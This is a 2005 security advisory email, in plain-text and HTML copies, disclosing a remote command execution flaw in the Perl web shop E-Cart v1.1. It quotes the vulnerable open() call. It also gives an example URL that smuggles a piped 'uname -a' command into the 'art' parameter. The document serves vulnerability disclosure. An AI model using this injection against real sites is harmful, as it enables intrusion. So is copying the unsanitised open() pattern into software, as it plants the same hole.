E-Cart version 1.1 remote command execution exploit.
575b7215f959d66769b1032e70023be88c3fe7affcae81a5810a504a97e4be9b
------=_Part_734_24926651.1114105332381
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <=3D E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Problem Description:
The bug is in the file index.cgi where the variable art that is put under=
=20
"open()", does
not have a control of data, allowing to the attacker to execute any type of=
=20
commands.
Vulnerable code
---------------
sub viewart {
&cartfooter;
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data =
=3D=20
<DATA>); release(DATA); close(DATA);
...
...
...
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Example:
http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&a=
rt=3Dreproductordvp-ns315.dat|uname%20-a|
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Fix:
Contact the Vendor.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
--
SoulBlack - Security Research
http://www.soulblack.com.ar
--=20
I=F1aki Cormenzana=20
SoulBlack`s Staff
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D
------=_Part_734_24926651.1114105332381
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
Title: E-Cart v1.1 Remote Command Execution<br>
Vulnerability discovery: SoulBlack - Security Research -<br>
<a href=3D"http://soulblack.com.ar">http://soulblack.com.ar</a><br>
Date: 20/04/2005<br>
Severity: High. Remote Users Can Execute Arbitrary Code.<br>
Affected version: <=3D E-Cart 2004 v1.1<br>
Vendor: <a href=3D"http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.c=
gi">http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi</a><br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Summary<br>
E-Cart is a mod of WepApp written in Perl. It is WebShop.<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Problem Description:<br>
<br>
The bug is in the file index.cgi where the variable art that is put under &=
quot;open()", does<br>
not have a control of data, allowing to the attacker to execute any type of=
commands.<br>
<br>
Vulnerable code<br>
---------------<br>
sub viewart {<br>
&cartfooter;<br>
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"=
);
hold(DATA); chomp(@data =3D <DATA>); release(DATA); close(DATA);<br>
...<br>
...<br>
...<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
<br>
*Example:<br>
<br>
<a href=3D"http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Drepr=
oductores_dvd&art=3Dreproductordvp-ns315.dat|uname%20-a|">http://SITE/D=
IRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&art=3D=
reproductordvp-ns315.dat|uname%20-a|
</a><br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Fix:<br>
<br>
Contact the Vendor.<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
--<br>
SoulBlack - Security Research<br>
<a href=3D"http://www.soulblack.com.ar">http://www.soulblack.com.ar</a><br>
<br>
<br>
<br>-- <br>I=F1aki Cormenzana <br>SoulBlack`s Staff<br>Y3VhbmRvIHRlbmVtb3Mg=
ZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D
------=_Part_734_24926651.1114105332381--